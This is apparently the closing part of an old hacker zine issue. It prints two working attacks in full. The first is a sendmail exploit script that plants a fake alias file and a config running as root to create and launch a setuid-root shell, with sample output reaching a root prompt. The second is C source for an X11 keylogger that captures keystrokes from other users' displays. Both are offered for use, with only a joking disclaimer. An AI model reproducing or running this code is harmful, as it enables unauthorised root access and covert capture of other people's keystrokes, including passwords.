DEBUGFLAGS=`calc $CONFIG`

echo "Creating alias.sh ..."
echo "#!/bin/sh
# this program will be executed when mail is sent to the fake alias.
# since solaris sh and csh and tcsh refuse to run when euid != realuid,
# we instead run the program we compiled above.
/bin/chmod 6777 $TEMPDIR/setid0
/bin/chown root $TEMPDIR/setid0
/bin/sync
" > alias.sh
chmod 755 alias.sh

echo "Creating fake alias file..."
echo "yash: |$TEMPDIR/alias.sh" > aliases

echo "Faking alias pointer in new config file..."
egrep -v '(OA|DZ|Ou|Og)' $CONFIG > /tmp/sm.cf
echo "
# hacks follow
OA/$TEMPDIR/aliases   # our fake alias file
Ou0                   # user ID to run as
Og0                   # group ID to run as
DZWHOOP-v1.0" >> /tmp/sm.cf

echo "Creating the sendmail script..."
cat > sendmail.script << _EOF_
helo
mail from:
rcpt to:
data
yet another sendmail hole?  suid whoop?
\.
# oops.. delete \ prior to execution
quit
_EOF_

echo "Executing $SENDMAIL $DEBUGFLAGS -bs..."
$SENDMAIL $DEBUGFLAGS -bs < sendmail.script

# give it time to execute.
sleep 4

# cleanup in 5 seconds
(sleep 5; rm -rf $TEMPDIR ; rm /tmp/sm.cf) &

if [ -u setid0 ]
then
  echo "setid0 is a suid shell. executing..."
  cd /
  $TEMPDIR/setid0 /bin/csh
  echo "end of script."
  exit 0
else
  echo "setid0 is not suid; script failed."
  echo "apparently, you don't have the bug. celebrate :-)"
  exit 1
fi
---------------------------------CUT HERE-----------------------------------
% sm.sh
setid0 is a suid shell. executing...
#
+++++
UNIX (X11) - Xserver hole - Get keypresses from other xterms :
---------------------------------CUT HERE------------------------------------
/* To compile, run it through your favorite ansi compiler something like
 * this :
 *
 *   gcc -o xkey xkey.c -lX11 -lm
 *
 * To run it, just use it like this :  xkey displayname:0
 * and watch as that display's keypresses show up in your shell window.
 *
 * Dominic Giampaolo (nick@cs.maxine.wpi.edu)
 */
#include
#include
#include
#include
#include
#include
#include

char *TranslateKeyCode(XEvent *ev);

Display *d;

void snoop_all_windows(Window root, unsigned long type)
{
  static int level = 0;
  Window parent, *children, *child2;
  unsigned int nchildren;
  int stat, i,j,k;

  level++;

  stat = XQueryTree(d, root, &root, &parent, &children, &nchildren);
  if (stat == FALSE) {
    fprintf(stderr, "Can't query window tree...\n");
    return;
  }

  if (nchildren == 0)
    return;

  /* For a more drastic inidication of the problem being exploited
   * here, you can change these calls to XSelectInput() to something
   * like XClearWindow(d, children[i]) or if you want to be real
   * nasty, do XKillWindow(d, children[i]).  Of course if you do that,
   * then you'll want to remove the loop in main().
   *
   * The whole point of this exercise being that I shouldn't be
   * allowed to manipulate resources which do not belong to me.
   */
  XSelectInput(d, root, type);
  for(i=0; i < nchildren; i++) {
    XSelectInput(d, children[i], type);
    snoop_all_windows(children[i], type);
  }
  XFree((char *)children);
}

void main(int argc, char **argv)
{
  char *hostname;
  char *string;
  XEvent xev;
  int count = 0;

  if (argv[1] == NULL)
    hostname = ":0";
  else
    hostname = argv[1];

  d = XOpenDisplay(hostname);
  if (d == NULL) {
    fprintf(stderr, "Blah, can't open display: %s\n", hostname);
    exit(10);
  }

  snoop_all_windows(DefaultRootWindow(d), KeyPressMask);

  while(1) {
    XNextEvent(d, &xev);
    string = TranslateKeyCode(&xev);
    if (string == NULL)
      continue;
    if (*string == '\r')
      printf("\n");
    else if (strlen(string) == 1)
      printf("%s", string);
    else
      printf("<<%s>>", string);
    fflush(stdout);
  }
}

#define KEY_BUFF_SIZE 256
static char key_buff[KEY_BUFF_SIZE];

char *TranslateKeyCode(XEvent *ev)
{
  int count;
  char *tmp;
  KeySym ks;

  if (ev) {
    count = XLookupString((XKeyEvent *)ev, key_buff, KEY_BUFF_SIZE, &ks,NULL);
    key_buff[count] = '\0';
    if (count == 0) {
      tmp = XKeysymToString(ks);
      if (tmp)
        strcpy(key_buff, tmp);
      else
        strcpy(key_buff, "");
    }
    return key_buff;
  } else
    return NULL;
}
--------------------------------CUT HERE------------------------------------
+++++

NOTE: all Standard Disclaimers (tm) apply. Also, if you DO use the things found in this file for malicious purposes, please let me know. I'll kick your ass before they lock you up.

Well, this should be enough to keep you all busy for a few weeks until the next release. Good luck, and happy hacking.

Ghost in the Machine
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

CLOSING -

Well, that concludes Issue 1. It's a bit smaller than I had hoped, but I'm already working on articles for the next issue, so it will hopefully be a bit larger and hopefully even better.
Hope you found these files useful, interesting, or at least worth the time it took to read them. gitm